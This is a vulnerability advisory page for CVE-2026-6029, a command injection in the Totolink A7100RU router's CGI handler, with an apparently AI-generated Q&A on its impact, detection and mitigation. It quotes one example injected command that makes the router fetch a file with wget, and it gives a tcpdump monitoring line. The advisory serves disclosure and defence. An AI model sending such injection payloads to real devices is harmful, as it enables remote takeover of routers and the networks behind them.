CVE-2026-6029
OS Command Injection in Totolink A7100RU CGI Handler (Remote
Publication date: 2026-04-10
Last updated on: 2026-04-10
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| totolink | a7100ru | 7.4cu.2313_b20191024 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-77 | The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. |
| CWE-78 | The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-6029 is a command injection vulnerability in the TOTOLINK A7100RU router, specifically in version 7.4cu.2313_b20191024. The flaw exists in the CGI script cstecgi.cgi within the function that processes a user-supplied parameter named "user." This parameter is formatted and then executed as an operating system command without proper sanitization, allowing an attacker to run arbitrary commands on the router remotely.
An attacker can exploit this by sending a crafted HTTP POST request containing a malicious "user" parameter to the router's /cgi-bin/cstecgi.cgi endpoint. For example, the attacker can inject commands like `wget 192.168.6.1:7777/testpoc` which the router will execute, demonstrating remote command execution capability.
How can this vulnerability impact me? :
This vulnerability allows remote attackers to execute arbitrary operating system commands on the affected router without any authentication. This can lead to full compromise of the device, including unauthorized access, control over network traffic, installation of malware, or use of the router as a pivot point for further attacks within the network.
Because the exploit is publicly available, attackers can easily leverage this flaw to disrupt network operations, steal sensitive information, or launch attacks against other systems connected to the compromised router.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring for suspicious HTTP POST requests sent to the endpoint /cgi-bin/cstecgi.cgi, especially those containing a JSON payload with a "user" parameter that includes command injection patterns.
A practical detection method is to capture and analyze network traffic for POST requests targeting /cgi-bin/cstecgi.cgi with unusual or suspicious "user" parameter values that attempt to execute commands such as wget or other shell commands.
For example, you can use the following command to monitor HTTP POST requests on your network (replace interface and filter as needed):
- tcpdump -i <interface> -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' | grep -i '/cgi-bin/cstecgi.cgi'
Alternatively, you can use tools like Wireshark or a web application firewall (WAF) to detect POST requests with suspicious payloads containing command injection patterns in the "user" parameter.
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting access to the vulnerable endpoint /cgi-bin/cstecgi.cgi to trusted networks or IP addresses only.
Disabling or blocking HTTP POST requests to this CGI handler can prevent exploitation.
If possible, update the firmware of the Totolink A7100RU router to a version that patches this vulnerability.
In the absence of an official patch, consider implementing network-level protections such as intrusion detection/prevention systems (IDS/IPS) to block malicious payloads targeting the "user" parameter.
Monitor logs for suspicious activity and commands executed via this vulnerability to detect exploitation attempts early.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability in Totolink A7100RU allows remote OS command injection via the setVpnAccountCfg function, which could lead to unauthorized control over the device.
Such unauthorized access and control can compromise the confidentiality, integrity, and availability of data processed or transmitted by the device.
This may result in non-compliance with common standards and regulations like GDPR and HIPAA, which require protection of personal and sensitive data against unauthorized access and breaches.